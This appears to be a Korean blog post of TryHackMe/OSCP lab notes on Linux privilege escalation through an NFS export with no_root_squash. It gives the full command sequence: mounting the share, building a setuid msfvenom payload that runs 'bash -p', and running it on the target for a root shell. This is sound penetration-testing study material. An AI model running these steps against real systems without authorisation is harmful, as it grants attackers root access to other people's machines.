OSCP/TryHackMe
[Linux] Linux PrivEsc
우와해커
2020. 7. 7. 16:59
NFS Misconf를 이용한 로컬 권한 상승
타겟 설정 체크
cat /etc/exports
스쿼시 옵션이 disabled 되어있는지 확인
....
/tmp *(rw,sync,insecure,no_root_squash,nosubtree_check)
...*no_root_squash 옵션으로 인해 NFS를 통해 생성된 파일은 원격 사용자의 ID를 상속합니다.
*사용자가 루트이고 루트스쿼싱이 활성화 된 경우 ID는 "nobody"사용자로 설정됩니다.
칼리셋팅
루트로 로그인 후 nfs연결
mkdir /tmp/nfs
mount -o rw,vers=2 타겟아이피:/tmp /tmp/nfs
연결된 폴더에 bash 실행 페이로드 생성
msfvenom -p linux/x86/exec CMD="/bin/bash -p" -f elf -o /tmp/nfs/shell.elf
bash 실행파일에 setuid 권한 부여
chmod +xs /tmp/nfs/shell.elf
타겟으로 변경 후 페이로드 실행
/tmp/shell.elf